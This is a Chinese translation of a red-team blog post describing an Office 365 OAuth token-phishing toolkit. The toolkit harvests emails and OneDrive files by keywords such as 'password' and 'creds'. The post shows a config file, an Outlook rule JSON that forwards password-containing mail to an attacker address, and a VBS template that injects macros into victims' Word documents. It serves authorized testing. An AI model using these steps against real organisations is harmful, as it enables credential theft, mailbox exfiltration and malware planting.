非常逼真的Office 365釣魚工具包分析
在紅隊參與期間,我們經常會與使用Office 365的組織進行聯繫。而當前針對這種環境的工具十分有限,這意味着我們可能需要在參與期間進行開發。爲了更好地爲這些環境做好準備,我們開發了一個專門針對Office 365的工具包。
本文我們將探討如何在Office 365大量使用的環境中,通過利用這些功能來幫助我們的紅隊參與。
概要
簡而言之,我們的工具包允許執行身份驗證令牌釣魚,以提取你可能感興趣的特定信息。這項技術本身並不新鮮,像Fancy Bear (APT28) 這樣的組織,就在 過去針對谷歌的活動 中使用過OAuth釣魚。
當前版本工具包的特性如下:
提取與特定關鍵字匹配的電子郵件
創建惡意Outlook規則
從OneDrive/Sharepoint中提取文件
對存儲的word文檔的宏注入
在深入瞭解如何使用此工具包之前,讓我們先簡要介紹一下主要組件:
釣魚端點(Phishing Endpoint )- 此端點負責提供執行令牌釣魚的HTML文件。
後端服務(Backend Service)- 此服務將使用“盜取”令牌並執行定義的攻擊。
管理界面(Management Interface )- 管理界面可用於檢查提取的信息。
建議按照如下方式部署此工具包:
部署
爲了突出本文的重點,我們將不會詳細介紹有關如何編譯,基礎架構如何設置等問題。我們假設已安裝了所有依賴,並已設置HTTPS redirector;我們將只關注與工具包相關的配置。
首先,我們需要更新配置以符合我們的需求。你可在template.conf進行配置。
示例配置如下:
[server] host = 127.0.0.1 ; The IP address for the external listener. externalport = 30662 ; Port for the external listener certificate = server.crt ; Certificate for the external listener key = server.key ; Key for the external listener internalport = 8080 ; Port for the internal listener. ; Keywords used for extracting emails and files of a user. [keywords] outlook = pass,vpn,creds,credentials,new onedrive = password,.config,.xml,db,database,mbd [backdoor] enabled = true ; Enable/Disable this feature macro = "C:\Test.bas" ; The location of the macro file to use for backdooring documents
根據需要配置你的工具包後,需要在Azure門戶上創建一個應用。轉到Azure Active Directory -> App Registrations -> Register an application:
註冊應用後,你需要複製應用ID並使用你的應用程序ID更改static/index.html。
此外,應將連接到釣魚端點的HTTPS redirector URL作爲此Azure應用上的重定向URL添加。
要添加重定向URL,請導航到該應用程序,然後單擊添加重定向URL即可。
例如,這裏我的URL爲: https://myphishingurl.com/
由於釣魚端點是單頁面應用程序,因此你需要在高級設置(Advanced settings)上啓用隱式授權流程( implicit grant flow)。
網絡釣魚登錄頁用於演示目的,你也可以在static/index.html上更改你的登錄頁面外觀。
特性
以下是工具包初始版本中當前實現的所有功能的簡要說明。
基於關鍵字的 Outlook Email 提取
此工具包可以使用關鍵字提取用戶的電子郵件。對於配置文件中定義的每個關鍵字,將下載所有與之匹配的電子郵件並將其存儲在數據庫中。這些電子郵件可以由之後由操作人員檢查。
Outlook 規則創建
Microsoft Graph API支持創建Outlook規則。你可以通過將規則JSON文件放置在rules/文件夾中來定義不同的規則。
有關如何創建規則的更多信息,請參閱MSDN文檔。
出於演示目的,以下是一個規則的示例。在加載時,會將主體包含“password”關鍵字的每封電子郵件轉發到[email protected]:
{ "displayName": "Example Rule", "sequence": 2, "isEnabled": true, "conditions": { "bodyContains": [ "password" ] }, "actions": { "forwardTo": [ { "emailAddress": { "name": "Attacker Email", "address": "[email protected]" } } ], "stopProcessingRules": false } }
基於關鍵字的 OneDrive/Sharepoint 文件提取
Microsoft Graph API可用於訪問OneDrive,OneDrive for Business和SharePoint文檔庫中的文件。此工具包可以使用關鍵字提取用戶文件。對於配置文件中的每個已定義關鍵字,將下載並保存與其匹配的所有文檔。然後,操作人員可以使用管理界面檢查文檔。
Word 文檔宏感染
在OneDrive上託管的用戶文檔可以通過注入宏來後門。如果啓用此功能,用戶訪問的最後15個文檔將被下載,並使用配置文件中定義的宏進行後門操作。上傳後門文件後,文檔的擴展名將被更改爲.doc,以在Word上支持宏。應該注意的是,在對文檔進行後門操作之後,它們不能在線編輯,這增加了我們執行payload的機會。
此功能只能在Windows上使用,因爲宏的插入是使用Word COM對象完成的。VBS文件由下面的模板構建並執行,因此如果你看到wscript.exe正在運行,請不要慌張。
Dim wdApp Set wdApp = CreateObject("Word.Application") wdApp.Documents.Open("{DOCUMENT}") wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}" wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0
Demo
讓我們來看一個簡單的演示:
安全考慮
除了工具所具有的功能外,它還會在運行的主機上打開一些攻擊面。首先,宏感染功能將打開word文件,如果你運行的是未修補的Office版本,可能會增加你的安全風險。此外,提取文件有可能下載到一些惡意文件,這些文件將被保存在你的電腦上。
OpSec方法可能包括正確隔離你的基礎架構,並且只允許與HTTPS redirector和Microsoft Graph API進行通信。
這篇文章由 Rio Sherri 撰寫,工具包可以從 MDSec Activebreach Github進行下載 。
注:在完成這項研究後,我們發現FireEye創建的現有工具包( PwnAuth )也採用了類似的方法,因此也應得到大家的認可。
*參考來源: mdsec ,FB小編secist編譯,轉載請註明來自FreeBuf.COM